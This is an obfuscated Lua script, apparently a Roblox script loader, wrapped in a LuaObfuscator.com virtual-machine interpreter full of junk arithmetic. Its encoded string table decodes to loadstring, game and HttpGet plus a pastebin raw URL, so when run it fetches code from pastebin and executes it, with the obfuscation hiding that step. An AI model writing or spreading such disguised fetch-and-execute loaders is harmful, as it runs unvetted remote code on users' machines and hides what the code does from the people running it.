--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==1) then v30=nil;v30=function(v40,v41,v42)if v42 then local v78=1279 -(780 + 499);local v79;while true do if (((679 -(110 + 569)) + 0)==v78) then v79=(v40/((3 -1)^(v41-(1 + 0))))%((8 -(8 -2))^(((v42-(1 -0)) -(v41-(1 + 0))) + 1 + 0));return v79-(v79%(1 + 0));end end else local v80=(1 + 1)^(v41-((5 -2) -2));return (((v40%(v80 + v80))>=v80) and (1 + 0)) or ((284 + 83) -(16 + 106 + 245));end end;v31=nil;v27=2;end if (v27==2) then v31=function()local v48=v2(v20,v28,v28);v28=v28 + 1;return v48;end;v32=nil;v32=function()local v49,v50=v2(v20,v28,v28 + (1759 -(1246 + 511)));v28=v28 + (9 -7);return (v50 * (2101 -(1329 + 516))) + v49;end;v27=3;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==0) then v28=1;v29=nil;v20=v5(v4(v20,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v81=0;local v82;while true do if (0==v81) then v82=v3(v1(v43,16));if v29 then local v99=0;local v100;while true do if (v99==1) then return v100;end if (0==v99) then v100=v6(v82,v29);v29=nil;v99=1;end end else return v82;end break;end end end end);v27=1;end if (3==v27) then v33=nil;v33=function()local v51=0 -(0 + 0);local v52;local v53;local v54;local v55;while true do if (v51==1) then return (v55 * (932127 + 15845089)) + (v54 * (46926 + 18610)) + (v53 * 256) + v52;end if ((904 -(119 + 785))==v51) then v52,v53,v54,v55=v2(v20,v28,v28 + (249 -(12 + 234)));v28=v28 + 2 + 2;v51=1;end end end;v34=nil;v27=4;end if (v27==7) then v39=function(v44,v45,v46)local v56=0;local v57;local v58;local v59;while true do if (v56==1) then v59=v44[3];return function(...)local v90=0;local v91;local v92;local v93;local v94;local v95;while true do if (v90==2) then v95=nil;v95=function()local v102=v57;local v103=v58;local v104=v59;local v105=v37;local v106={};local v107={};local v108={};for v112=0 + 0 + 0,v94 do if (((2222 + 792)<(89 + 3492)) and (v112>=v104)) then v106[v112-v104]=v93[v112 + (4 -3)];else v108[v112]=v93[v112 + 1 + 0];end end local v109=(v94-v104) + (273 -(109 + 163)) + 0;local v110;local v111;while true do local v113=0;local v114;while true do if ((v113==(0 + 0)) or ((1692 + (2300 -(67 + 475)))<(1130 + 1442))) then v114=0 + 0;while true do if (((353 + 763)>=(586 + (861 -415))) and (v114==(1 + 0 + 0))) then if ((v111<=(1 + 1)) or ((1910 -890)>(5537 -(33 + 615)))) then if ((v111<=(1182 -(924 + 258))) or ((12090 -(8862 -(363 + 333)))>=4638)) then do return;end elseif ((v111==(1389 -(648 + 740))) or (4205<(1615 -587))) then v108[v110[1 + 1]]=v110[3];else local v142=0 + 0;local v143;local v144;while true do if (((5264 -(1172 + 243))>=(7994 -4407)) and (v142==(1 + 0))) then while true do if (((611 -(180 + 276))<=((3316 -(77 + 14)) + 1769)) and (v143==(1266 -(414 + 852)))) then v144=v110[1446 -((2171 -(475 + 738)) + 486)];v108[v144]=v108[v144](v14(v108,v144 + ((1 + 0) -0),v92));break;end end break;end if ((v142==(877 -(408 + 469))) or ((1714 + 1421)<(1595 + 1329))) then v143=(0 + 0) -0;v144=nil;v142=(938 -(651 + 285)) -1;end end end elseif (((6529 -(607 + 1367))>=(1359 + 2123)) and (v111<=4)) then if ((v111>(1 + 2)) or (((642 + 137) -(126 + 296))>(3128 -1239))) then local v145=0 + 0;local v146;local v147;while true do if (((1574 -(172 + 106))<=(5622 -(791 + 106))) and (v145==(1937 -(1585 + (666 -315))))) then v108[v146 + 1 + 0]=v147;v108[v146]=v147[v110[1721 -(431 + 1286)]];break;end if ((v145==(1682 -(61 + 1621))) or ((5663 -4040)==(91 + 171 + 987))) then local v169=1245 -(586 + 659);while true do if ((0==v169) or (((3320 -(35 + 360)) + 921)<((1283 + 1295) -(26 + 1211)))) then v146=v110[677 -(555 + 120)];v147=v108[v110[8 -5]];v169=1510 -(607 + 902);end if (((1478 -362)<=(3091 -(752 + 220))) and (v169==(277 -((421 -164) + 19)))) then v145=1 -0;break;end end end end else v108[v110[4 -2]]();end elseif (((3166 -(519 + 426))>=(3040 -1145)) and (v111==(4 + 1))) then local v148=0 + 0;local v149;local v150;local v151;local v152;local v153;while true do if ((v148==(0 + 0 + 0)) or ((362 + 265)>(1598 -(109 + 623)))) then v149=1205 -(528 + 677);v150=nil;v148=(21 + 463) -(41 + 442);end if ((v148==(1 + 0)) or ((9023 -(13905 -8127))<=(1988 -(1056 + 236)))) then v151=nil;v152=nil;v148=910 -(49 + 859);end if (((901 + 454)<=(15654 -11465)) and ((2 + 0)==v148)) then v153=nil;while true do if ((3664>=(2882 -1218)) and (v149==((81 + 32) -(36 + 77)))) then v150=v110[(365 + 452) -(494 + 321)];v151,v152=v105(v108[v150](v14(v108,v150 + (1866 -(789 + 222 + 854)),v110[1597 -(555 + 1039)])));v149=2 -1;end if (((1278 + 761)>(2181 -(452 + 492))) and ((2 + 0)==v149)) then for v183=v150,v92 do local v184=0 -0;local v185;while true do if (((4422 -(9981 -6514))>(421 -306)) and ((0 + 0)==v184)) then v185=990 -(866 + 124);while true do if (((0 -(0 -0))==v185) or ((5238 -(196 + (1215 -(6 + 1092))))<(3772 -(207 + 444)))) then v153=v153 + (1 -0);v108[v183]=v151[v153];break;end end break;end end end break;end if ((v149==(1829 -(1597 + 231))) or ((2153 + 2006)<=(2282 -(220 + 1744)))) then v92=(v152 + v150) -(3 -2);v153=0 + 0;v149=1 + 1;end end break;end end else v108[v110[1 + 1]]=v46[v110[1236 -(236 + 997)]];end v91=v91 + 1 + 0;break;end if ((v114==(1936 -(789 + 1147))) or ((4502 -3248)==(5865 -(256 + 954)))) then local v126=0 -0;while true do if ((v126==(1578 -(5 + 1573))) or ((14674 -10176)<=(2451 -(1190 + 408)))) then v110=v102[v91];v111=v110[543 -(481 + 61)];v126=1 + (664 -(364 + 300));end if ((v126==(1 + 0)) or ((57 + 731)==(2838 + 1424))) then v114=1 + 0;break;end end end end break;end end end end;v90=3;end if (v90==1) then v93={...};v94=v13("#",...) -1;v90=2;end if (3==v90) then A,B=v37(v12(v95));if  not A[1] then local v115=v44[4][v91] or "?";error("Script error at ["   .. v115   .. "]:"   .. A[2]);else return v14(A,2,B);end break;end if (v90==0) then v91=1;v92= -1;v90=1;end end end;end if (v56==0) then v57=v44[1];v58=v44[2];v56=1;end end end;return v39(v38(),{},v21)(...);end if (v27==6) then v38=nil;v38=function()local v60=1099 -(127 + 972);local v61;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v60==(6 -3)) then v67=nil;while true do local v96=0 + 0;while true do if (v96==(0 -0)) then local v101=0 + 0;while true do if (v101==1) then v96=1;break;end if ((0 -0)==v101) then local v121=0 + 0;while true do if (v121~=1) then else v101=1;break;end if (v121~=(258 -(236 + 22))) then else if (v61==(0 + 0)) then local v127=0 -0;while true do if ((1823 -(1436 + 387))==v127) then local v134=0;local v135;while true do if (v134==(0 -0)) then v135=916 -(345 + 571);while true do if (0==v135) then local v170=0;while true do if (v170==(796 -(138 + 658))) then v62={};v63={};v170=1;end if (v170~=(2 -1)) then else v135=1 -0;break;end end end if (v135==(547 -(492 + 54))) then v127=1761 -(1502 + 258);break;end end break;end end end if (v127~=1) then else v64={};v61=1772 -(1212 + 559);break;end end end if (v61==(12 -9)) then local v128=0 -0;local v129;while true do if (v128~=(0 + 0)) then else v129=0 -0;while true do if (v129~=(12 -(10 + 1))) then else return v65;end if (v129==(0 + 0)) then for v158=1 + 0,v33() do v63[v158-(1 + 0)]=v38();end for v160=3 -2,v33() do v64[v160]=v33();end v129=871 -(798 + 72);end end break;end end end v121=1893 -(710 + 1182);end end end end end if (v96==(2 -1)) then if ((356 -(109 + 245))==v61) then local v116=0 -0;local v117;local v118;while true do if (v116==(1796 -(1343 + 453))) then v117=0 + 0;v118=nil;v116=1 + 0;end if (v116~=(1751 -(78 + 1672))) then else while true do if (v117~=(694 -(486 + 208))) then else v118=1691 -(178 + 1513);while true do if (v118==(0 -0)) then local v136=0;while true do if ((1876 -(320 + 1556))~=v136) then else for v162=1 + 0,v66 do local v163=0 + 0;local v164;local v165;while true do if (v163==(674 -(479 + 195))) then v164=v31();v165=nil;v163=2 -1;end if (v163~=1) then else if (v164==(2 -1)) then v165=v31()~=(1715 -(769 + 946));elseif (v164==(786 -(761 + 23))) then v165=v34();elseif (v164==(3 + 0)) then v165=v35();end v67[v162]=v165;break;end end end v65[238 -(203 + 32)]=v31();v136=1;end if (v136==(1 + 0)) then v118=1 + 0;break;end end end if (v118==(4 -3)) then for v137=1 -0,v33() do local v138=0;local v139;while true do if (v138~=(0 -0)) then else v139=v31();if (v30(v139,1 + 0,1252 -(604 + 647))~=(0 + 0)) then else local v171=1937 -(1819 + 118);local v172;local v173;local v174;local v175;local v176;while true do if (v171==1) then v174=nil;v175=nil;v171=856 -(355 + 499);end if (v171~=(0 + 0)) then else v172=0;v173=nil;v171=634 -(414 + 219);end if (v171==(5 -3)) then v176=nil;while true do if ((0 + 0)==v172) then local v186=0 + 0;while true do if ((0 -0)~=v186) then else v173=0;v174=nil;v186=382 -(358 + 23);end if (v186~=(1 -0)) then else v172=1 + 0;break;end end end if (v172==(255 -(15 + 239))) then local v187=1521 -(213 + 1308);local v188;while true do if (v187==(471 -(77 + 394))) then v188=0 + 0;while true do if ((893 -(90 + 802))==v188) then v172=2;break;end if (v188==(1148 -(864 + 284))) then local v201=0 + 0;while true do if (v201==(262 -(122 + 140))) then v175=nil;v176=nil;v201=242 -(166 + 75);end if (v201==(653 -(315 + 337))) then v188=129 -(45 + 83);break;end end end end break;end end end if (v172~=(1 + 1)) then else while true do if (v173~=3) then else if (v30(v175,9 -6,2 + 1)~=(2 -1)) then else v176[4]=v67[v176[4]];end v62[v137]=v176;break;end if (v173==0) then local v190=351 -(212 + 139);local v191;local v192;while true do if (v190==(1 -0)) then while true do if (v191~=(0 + 0)) then else v192=0 -0;while true do if (1~=v192) then else v173=2 -1;break;end if ((1930 -(1475 + 455))==v192) then local v207=0;local v208;while true do if (v207==(765 -(738 + 27))) then v208=0;while true do if (v208==(0 -0)) then v174=v30(v139,1609 -(887 + 720),1 + 2);v175=v30(v139,4 + 0,649 -(91 + 552));v208=1;end if (v208==1) then v192=1499 -(1274 + 224);break;end end break;end end end end break;end end break;end if (0==v190) then v191=0 + 0;v192=nil;v190=1 + 0;end end end if (v173==(1660 -(1442 + 217))) then local v193=0;local v194;local v195;while true do if (v193~=1) then else while true do if (v194~=0) then else v195=0 + 0;while true do if (v195==(1 -0)) then v173=4 -2;break;end if (v195~=0) then else v176={v32(),v32(),nil,nil};if (v174==(0 -0)) then local v209=0 -0;local v210;while true do if (v209==0) then v210=1518 -(118 + 1400);while true do if (v210==(0 -0)) then v176[6 -3]=v32();v176[4]=v32();break;end end break;end end elseif (v174==1) then v176[1560 -(1531 + 26)]=v33();elseif (v174==2) then v176[3]=v33() -((6 -4)^(4 + 12));elseif (v174==(3 + 0)) then local v215=1025 -(954 + 71);local v216;local v217;while true do if (v215==(1 + 0)) then while true do if (0~=v216) then else v217=0 + 0;while true do if (v217~=(0 -0)) then else v176[5 -2]=v33() -(2^(3 + 13));v176[1365 -(619 + 742)]=v32();break;end end break;end end break;end if (v215~=(0 -0)) then else v216=0 -0;v217=nil;v215=1 -0;end end end v195=1;end end break;end end break;end if (v193==(1223 -(238 + 985))) then v194=0;v195=nil;v193=2 -1;end end end if (v173==2) then local v196=0 -0;while true do if (v196~=(1 + 0)) then else v173=3;break;end if (v196~=(0 -0)) then else local v202=0;while true do if (v202==(1420 -(1161 + 258))) then v196=1 + 0;break;end if ((1344 -(1025 + 319))==v202) then if (v30(v175,1972 -(1374 + 597),1)==(2 -1)) then v176[1 + 1]=v67[v176[885 -(618 + 265)]];end if (v30(v175,2,5 -3)==(669 -(628 + 40))) then v176[3]=v67[v176[2 + 1]];end v202=1 + 0;end end end end end end break;end end break;end end end break;end end end v61=9 -6;break;end end break;end end break;end end end if (v61==(2 -1)) then local v119=0 + 0;local v120;while true do if ((0 -0)~=v119) then else v120=0 -0;while true do if (v120~=1) then else v67={};v61=1236 -(1006 + 228);break;end if (v120~=0) then else local v130=0 -0;local v131;while true do if (v130==(0 -0)) then v131=0 + 0;while true do if (v131==1) then v120=1 + 0;break;end if (v131==(1251 -(152 + 1099))) then local v157=0 + 0;while true do if (v157==(1726 -(225 + 1500))) then v131=1 + 0;break;end if (v157==(388 -(138 + 250))) then v65={v62,v63,nil,v64};v66=v33();v157=2 -1;end end end end break;end end end end break;end end end break;end end end break;end if (v60==(1 + 1)) then local v87=0 -0;while true do if (v87~=(0 + 0)) then else local v97=561 -(362 + 199);while true do if (v97==(611 -(33 + 578))) then v65=nil;v66=nil;v97=1496 -(1472 + 23);end if (v97~=1) then else v87=740 -(375 + 364);break;end end end if (v87~=(1 + 0)) then else v60=370 -(53 + 314);break;end end end if (v60==0) then local v88=0;while true do if (v88==(2 -1)) then v60=1;break;end if (v88==(0 + 0)) then v61=651 -(279 + 372);v62=nil;v88=1;end end end if (v60==1) then local v89=0 -0;while true do if (v89==(2 -1)) then v60=373 -(109 + 262);break;end if (v89==0) then local v98=1237 -(1112 + 125);while true do if (v98==(115 -(55 + 60))) then v63=nil;v64=nil;v98=1476 -(1037 + 438);end if (v98~=(1 + 0)) then else v89=1;break;end end end end end end end;v39=nil;v27=7;end if (v27==4) then v34=function()local v68=v33();local v69=v33();local v70=(2 -1) + (0 -0);local v71=(v30(v69,1344 -(495 + 848),47 -27) * (2^(28 + 4))) + v68;local v72=v30(v69,21,7 + 24);local v73=((v30(v69,32)==(3 -2)) and  -(96 -(73 + 22))) or (2 -(1 + 0));if (v72==(0 -0)) then if (v71==(237 -(92 + 145))) then return v73 * (257 -(14 + 23 + 220));else v72=(6 -3) -2;v70=0 + 0;end elseif (v72==(2489 -(273 + 169))) then return ((v71==(1487 -(884 + 603))) and (v73 * ((1142 -(1097 + 44))/0))) or (v73 * NaN);end return v9(v73,v72-1023) * (v70 + (v71/((8 -6)^(16 + 36))));end;v35=nil;v35=function(v47)local v74;if  not v47 then local v83=752 -(725 + 27);while true do if ((0 -0)==v83) then v47=v33();if (v47==((0 + 0) -0)) then return "";end break;end end end v74=v4(v20,v28,(v28 + v47) -(1 + 0));v28=v28 + v47;local v75={};for v76=312 -(116 + 195), #v74 do v75[v76]=v3(v2(v4(v74,v76,v76)));end return v7(v75);end;v27=5;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F536459787558655500083O0012063O00013O001206000100023O002004000100010003001201000300044O0005000100034O00025O00022O00033O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (1==v0) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
